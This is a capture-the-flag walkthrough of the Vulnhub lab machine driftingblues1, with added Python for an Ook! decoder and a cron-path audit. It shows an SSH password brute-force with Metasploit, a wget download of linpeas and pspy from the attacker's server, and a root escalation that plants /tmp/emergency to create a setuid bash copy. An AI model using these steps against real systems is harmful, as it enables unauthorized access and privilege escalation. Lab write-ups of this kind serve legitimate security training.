We are going to exploit the driftingblues1 machine from Vulnhub. Our goal is to capture the user and root flags. Also, make sure to check out the walkthroughs on the Harry Potter series.
Foothold
fping
fping -aqg 10.0.2.0/24

nmap
ports=$(nmap -p- --min-rate=1000 -T4 10.0.2.9 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)
nmap -p$ports -sC -sV 10.0.2.9

gobuster dir
gobuster dir -u http://10.0.2.9 -x html,txt,php,bak --wordlist=/usr/share/wordlists/dirb/common.txt

We have secret.html and index.html files. We can open them in a browser, or use curl to save time.
curl
curl http://10.0.2.9/index.html

There is an email address, sheryl@driftingblues.box. So, we might speculate that there is a user sheryl and that the hostname of the server is driftingblues.box. We have to add that to the hosts file. Meanwhile, let's find some other information from the page.

echo L25vdGVmb3JraW5nZmlzaC50eHQ= | base64 -d

Information gathered from the page:
- The hostname is driftingblues.box
- There are two users: eric and sheryl.
- There is another path in the URL: /noteforkingfish.txt
Let's check the path /secret.html.
curl http://10.0.2.9/secret.html

It just tells us to dig deeper. We will!
Add to hosts file
sudo vi /etc/hosts

Open /noteforkingfish.txt
curl http://driftingblues.box/noteforkingfish.txt

I am a little afraid now, seeing these Ook! messages with different punctuation. Maybe it's some encoded message. We will search the internet for this.

I used another website to decode the message. https://www.geocachingtoolbox.com/index.php
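Ook! is Brainfuck with each of the eight commands spelled as a pair of "Ook" words, so an online decoder is just a word-pair translator plus a Brainfuck interpreter. The script below is an added example (not code from the original post or the decoding website) that does the same thing offline: it maps the Ook! pairs to Brainfuck, runs the program with a step limit so a malformed note cannot hang the decoder, and rejects unmatched brackets. The sample program is constructed here to print "Hi"; it is not the note from the machine.

```python
import re

# Standard Ook! mapping: each Brainfuck command is one pair of Ook words.
OOK_TO_BF = {
    ("Ook.", "Ook?"): ">",
    ("Ook?", "Ook."): "<",
    ("Ook.", "Ook."): "+",
    ("Ook!", "Ook!"): "-",
    ("Ook!", "Ook."): ".",
    ("Ook.", "Ook!"): ",",
    ("Ook!", "Ook?"): "[",
    ("Ook?", "Ook!"): "]",
}
BF_TO_OOK = {bf: ook for ook, bf in OOK_TO_BF.items()}
OOK_WORD = re.compile(r"Ook[.?!]")


def ook_to_bf(text):
    """Translate Ook! text into Brainfuck; anything between the words is ignored."""
    words = OOK_WORD.findall(text)
    if len(words) % 2:
        raise ValueError("Ook! program has an odd number of words")
    pairs = zip(words[0::2], words[1::2])
    return "".join(OOK_TO_BF[pair] for pair in pairs)


def bf_to_ook(code):
    """Inverse translation, used here only to build the constructed sample."""
    return " ".join(" ".join(BF_TO_OOK[c]) for c in code if c in BF_TO_OOK)


def run_bf(code, stdin=b"", max_steps=1_000_000):
    """Minimal Brainfuck interpreter: 8-bit wrapping cells, bounded step count."""
    jumps, stack = {}, []
    for i, c in enumerate(code):          # precompute matching brackets
        if c == "[":
            stack.append(i)
        elif c == "]":
            if not stack:
                raise ValueError("unmatched ']' at %d" % i)
            j = stack.pop()
            jumps[i], jumps[j] = j, i
    if stack:
        raise ValueError("unmatched '[' at %d" % stack[-1])
    tape, ptr, pc, out, inp = [0] * 30000, 0, 0, bytearray(), list(stdin)
    for _ in range(max_steps):
        if pc >= len(code):
            break
        c = code[pc]
        if c == ">":
            ptr += 1
        elif c == "<":
            ptr -= 1
        elif c == "+":
            tape[ptr] = (tape[ptr] + 1) % 256
        elif c == "-":
            tape[ptr] = (tape[ptr] - 1) % 256
        elif c == ".":
            out.append(tape[ptr])
        elif c == ",":
            tape[ptr] = inp.pop(0) if inp else 0
        elif c == "[" and tape[ptr] == 0:
            pc = jumps[pc]
        elif c == "]" and tape[ptr] != 0:
            pc = jumps[pc]
        pc += 1
    else:
        raise RuntimeError("step limit reached; the program may not terminate")
    return out.decode("latin-1")


def decode_ook(text, stdin=b""):
    """Decode an Ook! message by running it and returning what it prints."""
    return run_bf(ook_to_bf(text), stdin)


# Constructed sample (not the note from the machine): prints "Hi".
SAMPLE_BF = "++++++++[>+++++++++<-]>." + "+" * 33 + "."
SAMPLE_OOK = bf_to_ook(SAMPLE_BF)

if __name__ == "__main__":
    print(SAMPLE_OOK[:60] + " ...")
    print(decode_ook(SAMPLE_OOK))
```

Paste the contents of a file like noteforkingfish.txt into decode_ook() and the printed output is the hidden text; the step limit is what keeps a deliberately looping or truncated message from hanging the tool.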

This means we haven't yet identified the secret location, which seems to be a subdomain of driftingblues.box. We can enumerate virtual hosts using gobuster.
gobuster – vhost
gobuster vhost -u driftingblues.box --wordlist /usr/share/wordlists/dirb/common.txt

We found a vhost, test.driftingblues.box, so we add this host to our hosts file as well.
sudo vi /etc/hosts

Now, we will curl the newly found URL.
curl http://test.driftingblues.box

Let's enumerate this host using ZAP or nikto, whichever you feel comfortable with.
nikto -h http://test.driftingblues.box/

We saw that /ssh_cred.txt returns a 200 OK status. Let's open that file in Firefox.

Now, we know the format of the password, except that a single digit is missing at the end of it. So, we have to brute-force that digit to get in. For this, we can create a small wordlist with a script (bash, python, or anything else) or by hand, whichever is faster for you.
for i in {0..9}; do echo 1<snip>y${i};done | tee wordlist

Also, during our initial enumeration we found two users, eric and sheryl. Hence, we are going to brute-force SSH for these users with the Metasploit Framework.
msfconsole
msfconsole
use auxiliary/scanner/ssh/ssh_login
set username eric
set pass_file wordlist
set rhosts 10.0.2.9
set verbose true
run

We found out the password of user eric.
Privilege User – eric
Now, we can do ssh with the credentials.
ssh eric@10.0.2.9

Privilege Root
I will be using my two favourite tools, linpeas.sh and pspy, to enumerate further. linpeas.sh does Linux enumeration, whereas pspy does unauthenticated process snooping. For them to work, you have to start a web server on the local machine and serve those files.
On attacker (local) machine:
python -m http.server 8080
On target machine (download both tools first, then run linpeas.sh and keep a copy of its output):
wget http://10.0.2.15:8080/linpeas.sh
chmod +x linpeas.sh
wget http://10.0.2.15:8080/pspy64
chmod +x pspy64
./linpeas.sh | tee output
linpeas.sh found the cron job. It also reports that the installed sudo version might be vulnerable.

pspy
./pspy64

On running pspy64, we found that there is a backup script running every minute, and that it invokes another script from the /tmp directory.
Now, let’s examine the backup.sh script.
cat /var/backups/backup.sh

The backup.zip file which we saw earlier in the linpeas.sh enumeration is produced by this script. Also, the developer has left a backdoor in the script: it executes /tmp/emergency as root if that file exists. From here it is easy to get another shell or a reverse shell, add an SSH key, or change the root password; the possibilities are endless. For this, we just have to write the /tmp/emergency file and make it executable.
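The root cause here is a root-run cron script that references a path under a world-writable directory. As an added example (not part of the original walkthrough), the following audit script finds that pattern from the defender's side: it pulls the absolute paths out of a script, and flags any that are world-writable or that do not exist yet but sit in a world-writable directory such as /tmp, which is exactly how the /tmp/emergency hook becomes exploitable. The sandbox it builds is constructed to mirror the machine's layout in a temporary directory; the file and directory names inside it are assumptions, not paths from the machine.

```python
import os
import re
import stat
import tempfile

# Absolute paths mentioned in a shell script (a simple approximation that is
# good enough to catch a hard-coded /tmp/<name> hook).
PATH_RE = re.compile(r"(?<![\w@:-])(/[\w./-]+)")


def others_can_write(path):
    """True if the 'other' write bit is set on path (symlinks not followed)."""
    return bool(os.lstat(path).st_mode & stat.S_IWOTH)


def audit_script(script_path):
    """Return [(path, reason)] for every path a root-run script references
    that an unprivileged local user could modify or create."""
    with open(script_path) as fh:
        text = fh.read()
    findings = []
    if others_can_write(script_path):
        findings.append((script_path, "script itself is world-writable"))
    for p in sorted(set(PATH_RE.findall(text))):
        if os.path.lexists(p):
            mode = os.lstat(p).st_mode
            if stat.S_ISCHR(mode) or stat.S_ISBLK(mode):
                continue  # device nodes such as /dev/null are writable by design
            if others_can_write(p):
                findings.append((p, "world-writable file or directory"))
        else:
            parent = os.path.dirname(p)
            if os.path.isdir(parent) and others_can_write(parent):
                findings.append((p, "missing, but parent directory is world-writable"))
    return findings


def build_sandbox():
    """Constructed layout mirroring the machine: a root-run backup script that
    executes <sandbox>/tmp/emergency if it exists. Returns the script path."""
    base = tempfile.mkdtemp()
    dirs = {name: os.path.join(base, *name.split("/"))
            for name in ("tmp", "etc", "var/backups")}
    for path in dirs.values():
        os.makedirs(path)
        os.chmod(path, 0o755)
    os.chmod(os.path.join(base, "var"), 0o755)
    os.chmod(dirs["tmp"], 0o1777)          # sticky and world-writable, like the real /tmp
    conf = os.path.join(dirs["etc"], "backup.conf")
    open(conf, "w").close()
    os.chmod(conf, 0o644)                  # root-owned config: not a finding
    hook = os.path.join(dirs["tmp"], "emergency")   # deliberately absent
    script = os.path.join(dirs["var/backups"], "backup.sh")
    with open(script, "w") as fh:
        fh.write("#!/bin/bash\n"
                 f"source {conf}\n"
                 f"zip -r {dirs['var/backups']}/backup.zip {base}/var/www\n"
                 f"[ -f {hook} ] && {hook}\n")
    os.chmod(script, 0o755)
    return script


if __name__ == "__main__":
    for path, reason in audit_script(build_sandbox()):
        print(f"{reason}: {path}")
```

Run audit_script() over every script referenced from /etc/crontab, /etc/cron.d and root's crontab; the single finding on the sandbox is the missing hook under the sticky tmp directory, while the config file in etc and the backup.zip output under var/backups are correctly ignored. The fix on a real host is the same in every case: root-run scripts must only execute files from root-owned, non-world-writable locations.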
Add a custom bash
nano /tmp/emergency
chmod +x /tmp/emergency
Contents of /tmp/emergency:
#!/bin/bash
cp /bin/bash /tmp/bash && chmod +s /tmp/bash
The script copies the bash binary and sets the setuid bit on the copy. Therefore, when root runs it through the cron job, we get a copy of bash that is setuid root. Then we can simply run it with the -p flag, which keeps the effective root privileges, and impersonate root.
./pspy64

Now, we can try to impersonate the root user.
/tmp/bash -p

We got the root access.
cat /root/root.txt

We got the root flag.
Conclusion
I learnt about Ook! encoding from this machine. Other than that, we got to use gobuster vhost enumeration. The machine was labelled as easy, and it is. I will do driftingblues2 soon.